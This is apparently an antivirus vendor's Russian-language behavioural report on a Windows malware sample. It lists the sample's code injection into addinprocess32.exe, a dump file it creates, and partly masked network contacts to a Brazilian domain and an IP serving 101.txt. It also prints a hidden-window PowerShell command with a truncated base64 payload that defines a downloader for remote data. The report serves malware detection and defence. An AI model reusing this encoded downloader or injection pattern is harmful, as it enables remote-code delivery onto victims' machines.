Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\addinprocess32.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\content\1004-1828-wscript.exe-23-56-26-329.dump
Сетевая активность
Подключается к
- 'up#####eimagens.com.br':443
- '18#.#16.70.134':80
TCP
Запросы HTTP GET
- http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/CABD2A79A1076A31F21D253635CB039D4329A5E8.crt?87##############
- http://18#.#16.70.134/101.txt
Другие
- 'up#####eimagens.com.br':443
UDP
- DNS ASK up#####eimagens.com.br
Другое
Ищет следующие окна
- ClassName: 'OleMainThreadWndClass' WindowName: ''
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "$Codigo = 'ZnVuY3Rpb24gRG93bmxvYWREYXRhRnJvbUxpbmtzIHsgcGFyYW0gKFtzdHJpbmdbXV0kbGlua3MpICR3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyAkZG93bmxvYWRlZERhdGEgPSBAKCk7ICRz... (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\addinprocess32.exe'
